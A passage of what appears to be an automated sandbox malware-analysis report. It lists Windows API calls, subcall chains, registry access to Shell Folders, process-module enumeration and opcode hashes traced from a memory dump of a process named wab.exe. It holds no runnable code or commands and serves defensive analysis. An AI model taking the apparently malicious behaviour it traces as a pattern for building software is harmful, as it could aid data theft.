                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                • String ID:
                                                • API String ID: 159017214-0

                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 3150196962-0

                                                APIs
                                                Strings
                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: malloc
                                                • String ID: failed to allocate %u bytes of memory
                                                • API String ID: 2803490479-1168259600

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmpmemset
                                                • String ID:
                                                • API String ID: 1065087418-0

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID:
                                                • API String ID: 2221118986-0

                                                APIs
                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                • String ID:
                                                • API String ID: 1481295809-0

                                                APIs
                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 3150196962-0

                                                APIs
                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$PointerRead
                                                • String ID:
                                                • API String ID: 3154509469-0

                                                APIs
                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                • String ID:
                                                • API String ID: 4232544981-0

                                                APIs
                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0

                                                APIs
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$FileModuleName
                                                • String ID:
                                                • API String ID: 3859505661-0

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0

                                                APIs
                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: EnumNamesResource
                                                • String ID:
                                                • API String ID: 3334572018-0
                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004095FC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                • String ID:
                                                • API String ID: 3655998216-0
                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00445426
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                • String ID:
                                                • API String ID: 1828521557-0
                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                • memcpy.MSVCRT ref: 00406942
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@FilePointermemcpy
                                                • String ID:
                                                • API String ID: 609303285-0
                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID:
                                                • API String ID: 2081463915-0
                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
